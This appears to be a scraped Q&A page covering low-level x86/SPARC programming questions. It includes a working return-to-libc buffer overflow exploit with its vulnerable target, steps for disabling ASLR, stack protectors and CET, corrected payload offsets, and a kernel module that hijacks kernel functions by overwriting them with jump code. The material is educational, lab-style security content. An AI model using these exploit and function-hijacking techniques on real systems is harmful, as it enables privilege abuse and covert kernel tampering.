Hijack Syscall: Access system call arguments from struct pt_regs (64bit-x86) - c

Using a kprobes pre_handler, I am trying to access the system call arguments from struct pt_regs and modify them (which is the main goal) before the actual system call runs.
Say I am probing sys_link.
asmlinkage long sys_link(const char __user *oldname, const char __user *newname);
The pre_handler is defined as follows:
static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
printk(KERN_INFO "eax: %08lx ebx: %08lx ecx: %08lx edx: %08lx\n",
regs->orig_ax, regs->bx, regs->cx, regs->dx);
printk(KERN_INFO "esi: %08lx edi: %08lx ebp: %08lx esp: %08lx\n",
regs->si, regs->di, regs->bp, regs->sp);
printk(KERN_INFO "Process %s (pid: %d, threadinfo=%p task=%p)",
current->comm, current->pid, current_thread_info(), current);
return 0;
}
When I run link file1 file2 on the terminal, dmesg gives the following output:
[15105.691463] eax: ffffffffffffffff ebx: 7fff3e2e71c8 ecx: 7fff3e2e6e50 edx: 00000003
[15105.691467] esi: 7fff3e2e9478 edi: 7fff3e2e9472 ebp: 00000003 esp: ffff880022b0ff80
[15105.691472] Process link (pid: 9448, threadinfo=ffff880022b0e000 task=ffff880018b72e00)Pid: 9448, comm: link Tainted: P C O 3.2.0-53-generic #81-Ubuntu
On x86-64 the first two arguments are passed in rdi and rsi (labelled edi and esi in the output above), so in this case edi must contain the address of file1 and esi the address of file2.
I want to modify these register values, say change the value in esi to point to file3 (therefore the char __user *newname is now pointing to file3), before I return from the pre_handler. Given such a modification, now sys_link should work with file1 and file3 as its arguments.
Is this possible? If so, how?

Related

x86, amd64: Why does the SIGTRAP ucontext instruction pointer not point to the related int3?

As the title says - rip from ucontext_t does not point to the int3 that raised a SIGTRAP. Instead it points to the next instruction.
This deviates from my (naive) expectations that every faulted instruction will be retried upon return from signal handler (if context was not changed and process did not explicitly terminate while in the handler).
On the other hand, when getting SIGILL the context points to the bad instruction. On ARM and AArch64 the SIGTRAP context also points to the related bkpt #0/brk #0.
Test program:
/* sigtest.c */
#define _GNU_SOURCE
#include <stdio.h>
#include <signal.h>
#include <ucontext.h>
extern void do_int3(void);
extern void do_ud2(void);
void sighandler(int signo, siginfo_t* info, void* context) {
struct ucontext_t* uctx = context;
/* Yes, printf() here is bad. I promise to never ever do this in real programs */
printf("Got signal %d:\n"
"\tsi_addr: %p\n"
"\tcontext RIP: %p\n",
signo,
info->si_addr,
(void*)uctx->uc_mcontext.gregs[REG_RIP]);
}
int main(int argc, char** argv) {
struct sigaction sa = {};
sa.sa_flags = SA_SIGINFO | SA_ONESHOT;
sa.sa_sigaction = sighandler;
sigemptyset(&sa.sa_mask);
sigaction(SIGTRAP, &sa, NULL);
sigaction(SIGILL, &sa, NULL);
void (*fn)(void) = 0;
if (argv[1][0] == 't') {
fn = do_int3;
}
if (argv[1][0] == 'u') {
fn = do_ud2;
}
printf("call function at %p\n", fn);
fn();
printf("call returned\n");
}
; do_int3.S
.text
.globl do_int3
.type do_int3, #function
do_int3:
int3
ret
.size do_int3, .-do_int3
; do_ud2.S
.text
.globl do_ud2
.type do_ud2, #function
do_ud2:
ud2
ret
.size do_ud2, .-do_ud2
Compile and run:
$ cc sigtest.c do_int3.S do_ud2.S
$ ./a.out t
call function at 0x5620b87c6908
Got signal 5:
si_addr: (nil)
context RIP: 0x5620b87c6909
call returned
$ ./a.out u
call function at 0x557d1bc1590a
Got signal 4:
si_addr: 0x557d1bc1590a
context RIP: 0x557d1bc1590a
Illegal instruction (core dumped)
It is easy to see that for SIGTRAP the rip value points to the next instruction rather than to the int3.
Why is instruction pointer adjusted in SIGTRAP context to not retry related int3?
It's not adjusted by the kernel; the exception-return address pushed by hardware is the one after an int instruction, including int3.
Keep in mind that int3 is only slightly different from the normal case of int n such as int 0x80. int is designed as being like a syscall or far-call, so the (exception) return address is the one after the int. Otherwise an int 0x80 system call would re-run itself forever unless the kernel edited the exception-return info before iret.
So why doesn't Linux's int3 / int 3 handler decrement the saved RIP by 1? For one thing, debuggers can do that in software if they want to, and keeping the kernel simple is better (for maintenance, for efficiency, and so that software which does want the address pushed by hardware has less to undo).
For another, a fixed offset of 1 byte wouldn't always be correct: 2-byte CD 03 int 3 raises the same exception as 1-byte CC int3. And even if you wanted to try, x86 machine code doesn't uniquely decode backwards, so obfuscated machine code could give an address that wasn't the actual start of the instruction that executed. (Although it would run as int 3 or int3 if decoded from there). e.g. 2-byte rep int3 is indistinguishable from add al, 0xf3 / int3 if looking backwards.
Software like GDB that inserts an int3 will know what it inserted, and needs to know about the target machine details, so can deal with the offset.
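To make the backward-decoding problem concrete, here is a minimal sketch in plain C. It only inspects the bytes immediately before a saved RIP and reports which of the encodings mentioned above could have ended there. The function name, the flag names, and the idea of working on a copied byte buffer are all assumptions made for illustration; this is not how the kernel or GDB does it.

```c
#include <stddef.h>

/* Bit flags for the encodings that could end exactly at the saved RIP. */
enum {
    TRAP_CC    = 1 << 0,  /* 1-byte CC:    int3     */
    TRAP_CD_03 = 1 << 1,  /* 2-byte CD 03: int 3    */
    TRAP_F3_CC = 1 << 2   /* 2-byte F3 CC: rep int3 */
};

/*
 * code:    bytes of the code region (hypothetical buffer, e.g. copied
 *          out of the traced process)
 * rip_off: offset of the saved RIP inside code, i.e. the first byte
 *          after the trapping instruction
 * Returns a bitmask of the encodings consistent with the bytes that
 * precede rip_off. More than one bit set means the start of the
 * instruction cannot be recovered from the bytes alone.
 */
unsigned trap_candidates(const unsigned char *code, size_t rip_off)
{
    unsigned mask = 0;

    if (rip_off >= 1 && code[rip_off - 1] == 0xCC)
        mask |= TRAP_CC;
    if (rip_off >= 2 && code[rip_off - 2] == 0xCD && code[rip_off - 1] == 0x03)
        mask |= TRAP_CD_03;
    if (rip_off >= 2 && code[rip_off - 2] == 0xF3 && code[rip_off - 1] == 0xCC)
        mask |= TRAP_F3_CC;

    return mask;
}
```

For the byte sequence 04 F3 CC with the saved RIP just past it, both TRAP_CC and TRAP_F3_CC are set: that is the add al, 0xf3 / int3 versus rep int3 ambiguity. For CD 03 only TRAP_CD_03 is set, so subtracting a fixed 1 would land in the middle of the instruction.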

Return to libc buffer overflow attack

I tried to make a return-to-libc buffer overflow. I found the addresses of system, exit and /bin/sh, but when I run the vulnerable program nothing happens, and I don't know why.
[Screenshot: addresses of system and exit]
[Screenshot: address of /bin/sh]
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif
int bof(FILE* badfile)
{
char buffer[BUF_SIZE];
fread(buffer, sizeof(char), 300, badfile);
return 1;
}
int main(int argc, char** argv)
{
FILE* badfile;
char dummy[BUF_SIZE * 5];
badfile = fopen("badfile", "r");
bof(badfile);
printf("Return properly.\n");
fclose(badfile);
return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buf[40];
FILE* badfile;
badfile = fopen("./badfile", "w");
*(long *) &buf[24] = 0xbffffe1e; // /bin/sh
*(long *) &buf[20] = 0xb7e369d0; // exit
*(long *) &buf[16] = 0xb7e42da0; // system
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
return 1;
}
And this is the program that I use to find the MYSHELL address (for /bin/sh):
#include <stdio.h>
#include <stdlib.h> /* getenv */
int main(void)
{
char* shell = getenv("MYSHELL");
if(shell)
printf("%x\n", (unsigned int) shell);
return 0;
}
Terminal:
[Screenshot: terminal output after running retlib]
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:
ASLR: You have already disabled it with sudo sysctl -w kernel.randomize_va_space=0. A better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash.
Stack protector: The compiler can place stack canaries between the buffer and the return address on the stack, write a value into it before the buffer write operation is executed, and then just before returning, verify that it has not been changed by the buffer write operation. This can be disabled with -fno-stack-protector.
Shadow stack: Newer processors might have a shadow stack feature (Intel CET) that, when a function is called, stashes a copy of the return address away from writable memory; the copy is checked against the return address when the function returns. This (and some other CET protections) can be disabled with -fcf-protection=none.
The question does not mention it, but the addresses used in the code (along with use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:
gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address in one binary and using it in another, it is really important that both run with identical environment variables and identical shell invocations (at least in length). If one is executed as a.out, the other should also be executed as a.out. Running one from a different path, or with a different argv, will move the environment variable.
Alternatively, you can print the address of the environment variable from within the vulnerable binary.
By looking at the disassembly of bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread@plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is passed as the first argument to fread; this is the buffer that will be overflowed. Also note that ebp holds the value esp had just after ebp was pushed in the first instruction, so ebp points to the saved ebp, which is followed by the return address. From the start of the buffer, the saved ebp is therefore 20 bytes away and the return address is 24 bytes away, so the exploit has to place system at offset 24, exit at 28, and the /bin/sh address at 32:
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$
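The offset arithmetic in this answer can be written down as a small helper. This is only a sketch under assumptions: the function names are made up for illustration, the three addresses are parameters the caller has to supply (none are filled in here), and the layout assumed is the 32-bit one from the disassembly, with a 4-byte saved ebp between the buffer and the return address. It writes each word byte by byte, so it does not rely on the size of long on the machine that builds the file.

```c
#include <stdint.h>
#include <string.h>

#define PTR_SIZE 4u  /* 32-bit target: saved ebp and addresses are 4 bytes */

/* Offset of the return address, given how far below ebp the buffer starts. */
size_t ret_addr_offset(size_t buf_below_ebp)
{
    return buf_below_ebp + PTR_SIZE;  /* skip over the saved ebp */
}

/* Store a 32-bit value in little-endian order, independent of the host. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/*
 * Fill payload with filler bytes and place the three words:
 *   return address      -> system_addr
 *   system's return     -> exit_addr
 *   system's argument   -> binsh_addr
 * Returns the number of bytes used, or 0 if payload is too small.
 */
size_t build_payload(unsigned char *payload, size_t len, size_t buf_below_ebp,
                     uint32_t system_addr, uint32_t exit_addr,
                     uint32_t binsh_addr)
{
    size_t ret = ret_addr_offset(buf_below_ebp);
    size_t used = ret + 3 * PTR_SIZE;

    if (len < used)
        return 0;

    memset(payload, 0x41, used);                     /* filler up to the end */
    put_le32(payload + ret, system_addr);            /* offset 24 for 0x14 */
    put_le32(payload + ret + PTR_SIZE, exit_addr);   /* offset 28 */
    put_le32(payload + ret + 2 * PTR_SIZE, binsh_addr); /* offset 32 */
    return used;
}
```

With buf_below_ebp = 0x14, as read from the lea -0x14(%ebp) instruction, ret_addr_offset returns 24 and the three words land at offsets 24, 28 and 32, matching the corrected lines above. A 40-byte buf is large enough, since 36 bytes are used.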

Char Array conversion from C to SPARC

Consider the C source code statements shown below.
struct person
{
char name[30];
int id;
int points;
};
char Fmt[] = "Name: %s ID: %d Points: %d\n";
void display_one( struct person List[], int I )
{
printf( Fmt, List[I].name, List[I].id, List[I].points );
}
Complete the SPARC assembly language code segment below so that the sequence
of assembly language statements is equivalent to the C statements above.
.section ".data"
.align 4
Fmt: .asciz "Name: %s ID: %d Points: %d\n"
.global display_one
.section ".text"
.align 4
display_one:
save %sp, -96, %sp
smul %i1, 40, %l1
add %i0, %l1, %l0
set Fmt, %o0
mov %l0, %o1
ld [%l0+32], %o2
ld [%l0+36], %o3
call printf
nop
ret
restore
I was wondering what the smul %i1, 40, %l1 line is doing. I don't understand why it is multiplying by 40. If anyone could explain that would be great. Thanks.
40 is the size of struct person:
char name[30]; // 30 bytes
// 2 bytes padding to make the following int aligned
int id; // 4 bytes
int points; // 4 bytes
The parameter I is multiplied by 40 to compute the address of List[I].
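The layout can be checked from C with sizeof and offsetof. The sketch below assumes a 4-byte int with 4-byte alignment, which is what the assembly above relies on; the helper function names are made up for illustration.

```c
#include <stddef.h>

struct person {
    char name[30];
    int  id;
    int  points;
};

/* Byte offset of List[i] from the start of the array.
 * This is the value that smul %i1, 40, %l1 computes. */
size_t element_offset(size_t i)
{
    return i * sizeof(struct person);
}

/* Offsets used by the two ld instructions: [%l0+32] and [%l0+36]. */
size_t id_offset(void)     { return offsetof(struct person, id); }
size_t points_offset(void) { return offsetof(struct person, points); }
```

Under that assumption sizeof(struct person) is 40, id sits at offset 32 (30 bytes of name plus 2 bytes of padding), and points at offset 36, which is why the assembly loads from %l0+32 and %l0+36 after adding the scaled index to the base of List.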

Accessing a register without using inline assembly with gcc

I want to read the stack pointer register value without writing inline assembly. The reason is that I want to assign the stack pointer value to an element of an array, and I find it cumbersome to access an array using inline assembly. So I would like to do something like this:
register "rsp" long rsp_alias; <--- How do I achieve something like that in gcc?
long current_rsp_value[NUM_OF_THREADS];
current_rsp_value[tid] = rsp_alias;
Is there anything like that possible with gcc?
There's a shortcut:
register long rsp asm ("rsp");
Demo:
#include<stdio.h>
void foo(void)
{
register long rsp asm ("rsp");
printf("RSP: %lx\n", rsp);
}
int main()
{
register long rsp asm ("rsp");
printf("RSP: %lx\n", rsp);
foo();
return 0;
}
Gives:
$ gdb ./a.out
GNU gdb (Gentoo 7.2 p1) 7.2
...
Reading symbols from /home/user/tmp/a.out...done.
(gdb) break foo
Breakpoint 1 at 0x400538: file t.c, line 7.
(gdb) r
Starting program: /home/user/tmp/a.out
RSP: 7fffffffdb90
Breakpoint 1, foo () at t.c:7
7 printf("RSP: %lx\n", rsp);
(gdb) info registers
....
rsp 0x7fffffffdb80 0x7fffffffdb80
....
(gdb) n
RSP: 7fffffffdb80
8 }
Taken from the Variables in Specified Registers documentation.
register const long rsp_alias asm("rsp");
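If depending on a specific register name is a concern, a different technique that also avoids inline assembly is the GCC/Clang builtin __builtin_frame_address(0). Note that this is a swap: it returns the current function's frame address, not the exact value of rsp, so it only approximates what the question asks for. GCC's documentation describes local register variables mainly as a way to pin operands of extended asm, so reading one directly may behave differently across compilers and optimization levels. The sketch below stores the frame address into a per-thread array like the one in the question; the function name is hypothetical.

```c
#include <stdint.h>

#define NUM_OF_THREADS 4

/* Same idea as current_rsp_value[] in the question. */
static uintptr_t current_sp_value[NUM_OF_THREADS];

/*
 * Record an address inside the current stack frame for thread slot tid.
 * noinline keeps this function's frame separate from its caller's.
 * The value is the frame address, which is close to but not equal to
 * the stack pointer.
 */
__attribute__((noinline))
uintptr_t record_stack_position(int tid)
{
    uintptr_t sp = (uintptr_t)__builtin_frame_address(0);

    current_sp_value[tid] = sp;
    return sp;
}
```

A caller would use it as record_stack_position(tid); the array element then holds an address on that thread's stack, which is often enough for bookkeeping such as checking which stack a pointer belongs to.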

Errors when replacing a Linux kernel function

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/types.h>
#define CODESIZE 7
static unsigned char original_code[CODESIZE];
static unsigned char jump_code[CODESIZE] =
"\xb8\x00\x00\x00\x00" /* movl $0, %eax (address patched in later) */
"\xff\xe0" /* jmp *%eax */
;
void (*sync_readahead)( struct address_space *mapping, struct file_ra_state *ra, struct file *filp, pgoff_t offset, unsigned long req_size ) = (void (*)(struct address_space *, struct file_ra_state *, struct file *, pgoff_t , unsigned long ) )0xc0197100;
int hijack_start(void);
void hijack_stop(void);
void intercept_init(void);
void intercept_start(void);
void intercept_stop(void);
void fake_printk(struct address_space *mapping, struct file_ra_state *ra, struct file *filp, pgoff_t offset, unsigned long req_size);
int hijack_start()
{
printk(KERN_INFO "I can haz hijack?\n" );
intercept_init();
return 0;
}
void hijack_stop()
{
intercept_stop();
return;
}
void intercept_init()
{
printk(KERN_INFO "in the intercept_init\n" );
memcpy( original_code, sync_readahead, 7 );
*(long *)&jump_code[1] = (long)fake_printk;
memcpy( sync_readahead, jump_code, 7 );
printk(KERN_INFO "in the hijack?\n" );
//real_printk=NULL;
printk(KERN_INFO "begin the hijack?\n" );
memcpy( sync_readahead, jump_code, CODESIZE );
printk(KERN_INFO "begin the hijack?\n" );
return;
}
void intercept_stop()
{
memcpy( sync_readahead, original_code, CODESIZE );
}
void fake_printk(struct address_space *map, struct file_ra_state *a, struct file *fil, pgoff_t offse, unsigned long req_siz)
{
printk(KERN_INFO "in the fake printk\n");
// return ret;
}
MODULE_LICENSE("GPL");
module_init( hijack_start );
module_exit( hijack_stop );
I want to replace a Linux kernel function by its address (taken from /proc/kallsyms), but when I memcpy the jump code over the function in the kernel:
memcpy( sync_readahead, jump_code, CODESIZE );
an error occurs (segmentation fault). I have seen other examples that replace a Linux kernel function the same way. Could you please help me solve the problem? Thank you very much.
Information as follows:
ubuntu kernel: [ 574.826458] *pde = 0087d067 *pte = 00197161
ubuntu kernel: [ 574.826468] Modules linked in: hijack(+) test(+) binfmt_misc bridge stp bnep input_polldev video output vmblock vsock vmmemctl vmhgfs pvscsi acpiphp lp ppdev pcspkr psmouse serio_raw snd_ens1371 gameport snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd soundcore snd_page_alloc vmci i2c_piix4 parport_pc parport intel_agp agpgart shpchp mptspi mptscsih mptbase scsi_transport_spi floppy fbcon tileblit font bitblit softcursor vmxnet
ubuntu kernel: [ 574.826491]
ubuntu kernel: [ 574.826493] Pid: 4694, comm: insmod Tainted: G D (2.6.28-11-generic #42-Ubuntu) VMware Virtual Platform
ubuntu kernel: [ 574.826496] EIP: 0060:[<f7c92101>] EFLAGS: 00010246 CPU: 0
ubuntu kernel: [ 574.826498] EIP is at intercept_init+0x41/0x70 [hijack]
ubuntu kernel: [ 574.826499] EAX: f5ec4b60 EBX: 00000000 ECX: ffffffff EDX: 00004c4c
ubuntu kernel: [ 574.826501] ESI: f7c9252c EDI: c0197100 EBP: f5edbe18 ESP: f5edbe0c
ubuntu kernel: [ 574.826502] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068
ubuntu kernel: [ 574.826506] f7c921a6 f7c92130 00000000 f5edbe24 f7c92147 f7c921d5 f5edbf8c c010111e
ubuntu kernel: [ 574.826618] ---[ end trace ccc07e4b4d814976 ]---
Kernel function hijacking is very tricky business, and it needs to be exactly right in order to not run into all kinds of issues.
I am currently working on a module that does this, and it (at the time of this writing) works for 2.6.18+ kernels:
https://github.com/cormander/tpe-lkm
You'll be most interested in the hijacks.c file.
Many parts of this process depend on the architecture, the kernel version, and CPU features.
UPDATE
The module now uses the 0xE9 jump opcode and should work for you. The nitty-gritty details are in hijacks.c, and the "high level" logic you'll be most interested in is in the hijack_syscalls() function in security.c
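For readers unfamiliar with the 0xE9 opcode mentioned in the update: it is the x86 near jump with a 32-bit displacement, measured from the end of the 5-byte instruction. The sketch below only shows how those 5 bytes are computed. It is not taken from tpe-lkm, the function name is hypothetical, and it deliberately leaves out the hard parts (making the kernel text page writable, synchronizing CPUs, saving the overwritten bytes). The pte value in the oops above has its write bit clear, which suggests the memcpy faulted because the target page was read-only, but that is a reading of the log and not something the answer states.

```c
#include <stdint.h>
#include <stddef.h>

#define JMP_REL32_SIZE 5

/*
 * Encode "jmp rel32" (opcode E9) into out[5].
 *   from: address where the patch will be written (hypothetical)
 *   to:   address of the replacement function (hypothetical)
 * The displacement is relative to the instruction that follows the
 * jump, i.e. from + 5. Returns 0 on success, or -1 if the distance
 * does not fit in a signed 32-bit displacement (only possible in a
 * 64-bit address space; 32-bit addresses wrap and always fit).
 */
int encode_jmp_rel32(unsigned char out[JMP_REL32_SIZE],
                     uint64_t from, uint64_t to)
{
    int64_t disp = (int64_t)(to - (from + JMP_REL32_SIZE));
    uint32_t d;

    if (disp < INT32_MIN || disp > INT32_MAX)
        return -1;

    d = (uint32_t)(int32_t)disp;
    out[0] = 0xE9;                              /* jmp rel32 */
    out[1] = (unsigned char)(d & 0xff);         /* little-endian rel32 */
    out[2] = (unsigned char)((d >> 8) & 0xff);
    out[3] = (unsigned char)((d >> 16) & 0xff);
    out[4] = (unsigned char)((d >> 24) & 0xff);
    return 0;
}
```

Compared with the mov/jmp pair in the question, this form is 5 bytes instead of 7 and does not clobber eax, at the cost of being position-dependent: the bytes must be recomputed for each patch location.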
